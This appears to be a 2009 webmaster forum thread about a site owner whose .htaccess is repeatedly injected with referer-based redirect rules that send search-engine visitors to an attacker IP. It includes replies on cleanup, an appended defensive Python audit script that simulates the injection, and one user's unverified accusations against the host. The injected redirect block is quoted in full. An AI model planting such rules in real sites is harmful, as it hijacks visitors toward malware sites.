Forum Moderators: phranque


.htaccess newbie question


axilos

8:28 am on Jan 27, 2009 (gmt 0)

10+ Year Member



Hello,

How do I prevent an unauthorized person from changing my .htaccess file? I have protected one folder, and in the root I have an empty .htaccess, but now every day someone adds this at the bottom of .htaccess (408 bytes):


RewriteEngine On
RewriteCond %{HTTP_REFERER} .*oogle.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ahoo.*$ [NC]
RewriteRule .* http://123.123.xx.xyz/join.html?s=join [R,L]

I have this problem on my sites where I had protected some folders...

If I don't remove the .htaccess quickly, on Google I get on my website "this site can harm your computer"...

When I delete the .htaccess file, the day after someone adds this hacked one again.
I changed my password to a really complex one without results. I don't know how someone can add this file.

Can you help me prevent this from happening?

[edited by: engine at 10:22 am (utc) on Jan. 27, 2009]
[edit reason] IP obfuscated [/edit]

jdMorgan

2:00 pm on Jan 27, 2009 (gmt 0)

WebmasterWorld Senior Member 10+ Year Member



You need to speak with your hosting company about their server security problem. Also, make sure that your PHP, forum, blog, and news feed software is updated to the latest version, even if you don't use all of it.

In the meantime, change all of your passwords* immediately. If this does not help, take your site offline and move it to a new hosting company, because if changing passwords doesn't help, it would mean that that hacker has access from inside your hosting company's network.

Also, please do not post domain names or IP addresses here which lead to hacker sites! Always use "example.com" since this domain can never be owned and is therefore safe for use as an example.

* To be clear, go to the 'control panels' for all of the software packages installed on your server, and change the passwords. The hacker may be using the default login password for server software that you do not even use. Your hosting company's support desk will be the best source for help with this problem. If they do not take the problem seriously or cannot help you, then find another host!

Jim

[edited by: jdMorgan at 2:03 pm (utc) on Jan. 27, 2009]

axilos

2:22 pm on Jan 27, 2009 (gmt 0)

10+ Year Member



Sorry for writing the IP address in public.

Changing the password didn't help, because after the change it happens again.

I host at ixwebhosting (I heard that they are very good) and I contacted them 6 hours ago, still no answer.

In the meantime I spotted one file in my root directory named: modsurl.php
I don't know who put that file there or how, but that was on 03 Jan '09, and I have now deleted it myself. I made a copy of it on my computer. This script uses curl_init(), curl_exec() etc.

I don't know if this script can change .htaccess or if this was a different problem.
In the HTTP log file there is something like /modsurl.php?urlx=http://www.example.com/app/login (.ru)

But I think that if someone got my account password he could delete all my websites etc., not just add .htaccess and modsurl.php.

Actually, I have two sites with hacked .htaccess but only one has modsurl.php, so I think this is something else.

Just wondering how it is possible to change only .htaccess.

axilos

7:54 am on Jan 28, 2009 (gmt 0)

10+ Year Member



Hello,

Just to report this, in case it helps someone who gets the same problem.

The hosting company contacted me and said that one of my computers is infected with Antivirus 2009, which steals data like FTP usernames and passwords, which are used to access the server and upload .htaccess files. The infected .htaccess redirects traffic to a website where this Antivirus 2009 gets installed on your computer without you knowing that this is happening (I have Kaspersky, updated daily). And so on in a circle, looking for new ...

jdMorgan

5:05 pm on Jan 28, 2009 (gmt 0)

WebmasterWorld Senior Member 10+ Year Member



Two points:

First, it does not matter *what* the hacker did to your site. What matters is that *they were able to hack your site*. They could have deleted all your files, but instead of damaging it, they wanted to use it to fool the search engines to get traffic to their own (probably malicious) site. It is good to know that the security breach was not at iX, but in your own PC.

Second, what you have isn't technically a virus, it is probably a key-logger. So don't blame Kaspersky for missing it. Instead, add a few more security programs that protect against more than just viruses. A pretty good program I found recently that can clean up and protect against keyloggers and other malware is "MalWareBytes" -- Try the free version to see if it will remove your problem.

If MalWareBytes does not help, post again. I'll go try to find all the nice free anti-malware programs I have found and used (I have a list *somewhere* on this huge hard drive... :)

Jim

g1smd

12:17 am on Jan 29, 2009 (gmt 0)

WebmasterWorld Senior Member 10+ Year Member Top Contributors Of The Month



MalwareBytes is the exact tool you need to get rid of AntiVirus 2009, AntiSpyware 2009 and previous versions going back several years. You'll sometimes need two passes to get rid of it.

Sometimes you'll need to run Spybot Search and Destroy to get rid of the last traces, and if you are really unlucky you'll have to revert a load of changes it made to your HOSTS file too.

I've removed this junk from several dozen machines in the last year, and several of those are used by people who have avoided getting any viruses for a decade. This one is tricky.

axilos

7:47 am on Jan 30, 2009 (gmt 0)

10+ Year Member



Hello,

IX also told me to get "MalWareBytes" and I did it. 12 infections were found on the computer from which I did FTP access. Yep, this tool is awesome.

I also got the FTP log from IX from the time of the attack, and in it I can see one IP address at different times when I was surely sleeping, and I know that this is not my IP address.

Now the site is clean, and I learned a lesson :) and know how powerful .htaccess can be.

Also I saw the folder permissions (I mean the root of the website) were changed to ... can't remember the number, but it allowed read/write/execute access for owner, group and user. I changed the permissions back to only read and execute for group and user. I don't know how this happened or how this functions. When you change the permissions of a sub-folder, are the main folder's permissions also changed!?

About deleting the complete web site I'm not scared, because I always have an identical copy on my little local server :)

Cheers
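The two things axilos noticed after the fact (a .htaccess that changes overnight and a document root opened up to world write) can be caught the same day with a baseline check. Added example, not code from the thread or from the hosting company: snapshot_htaccess records a SHA-256 per .htaccess, audit_tree reports any that differ from the baseline plus every directory with the o+w bit set, and demo() builds a constructed temporary tree that replays the scenario (hostname malicious.example.com is a placeholder).

```python
import hashlib
import os
import stat
import tempfile

def sha256_file(path):
    h = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()

def snapshot_htaccess(root):
    """Baseline: relative path -> sha256 for every .htaccess under root."""
    baseline = {}
    for dirpath, _dirs, files in os.walk(root):
        if ".htaccess" in files:
            p = os.path.join(dirpath, ".htaccess")
            baseline[os.path.relpath(p, root)] = sha256_file(p)
    return baseline

def audit_tree(root, baseline):
    """Report .htaccess files added, removed or modified since the baseline, and
    directories writable by 'other' (the bit axilos found set on his document root)."""
    current = snapshot_htaccess(root)
    changed = sorted(p for p in set(baseline) | set(current)
                     if baseline.get(p) != current.get(p))
    world_writable = [os.path.relpath(d, root) for d, _dirs, _files in os.walk(root)
                      if os.stat(d).st_mode & stat.S_IWOTH]
    return {"changed_htaccess": changed, "world_writable_dirs": sorted(world_writable)}

def demo():
    """Constructed scenario: take a baseline of a small site, then replay the attack
    (a redirect block appended to the root .htaccess, document root chmod'ed to 777)."""
    root = tempfile.mkdtemp()
    os.makedirs(os.path.join(root, "private"), mode=0o755)
    with open(os.path.join(root, ".htaccess"), "w") as fh:
        fh.write("")  # the empty root .htaccess from the thread
    with open(os.path.join(root, "private", ".htaccess"), "w") as fh:
        fh.write("AuthType Basic\nRequire valid-user\n")
    baseline = snapshot_htaccess(root)
    with open(os.path.join(root, ".htaccess"), "a") as fh:  # simulated injection
        fh.write("RewriteEngine On\nRewriteRule .* http://malicious.example.com/ [R,L]\n")
    os.chmod(root, 0o777)  # simulated permission change
    return audit_tree(root, baseline)
```

Store the baseline somewhere the FTP account cannot write to; a baseline kept next to the site is as exposed as the .htaccess files it protects.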

Boulder90

7:03 pm on Jan 31, 2009 (gmt 0)

10+ Year Member



Axilos - IXwebhosting is totally lying to you right now. They have had someone hacking their servers for months now, delivering Yahoo Java insertion scripts and .htaccess hacks that look exactly like what you posted. See this site. It covers your exact problem:
[ixwebhostwarning.wordpress.com...]

This has been going on for months and months. I had to move most of my sites, and it probably explains why the page rank for one site dropped 2 points.

The problem with cleaning the sites is that even after getting them spotless, they would be reinfected in a few days.

This is the fault of IX webhosting, not you.

The good news is they are upgrading everything this week to new levels of security. The bad news is I don't know if I can ever trust them again. See this for the new security update:

[ixwebhostwarning.wordpress.com...]

I'm sad to see that they have STILL not cleared this problem from their servers.

Pathetic.

The PHP upgrade will occur over the next two weeks, so maybe that will take care of it. I've had two managers admit to me that the problem is their servers, and that over 100,000 sites are affected. I have received a year of free service as well due to the problem. All my PHP-based sites have been moved to a new host, and my main static HTML site had to be cleaned on every page (Yahoo insertion script).

[edited by: Boulder90 at 7:08 pm (utc) on Jan. 31, 2009]